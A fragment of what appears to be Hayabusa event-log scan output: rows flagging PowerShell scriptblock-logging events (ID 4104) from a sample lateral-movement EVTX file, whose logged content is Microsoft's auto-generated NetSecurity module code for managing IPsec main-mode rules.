} Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = 
$null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; V",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Polic",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"alue = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = 
${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] 
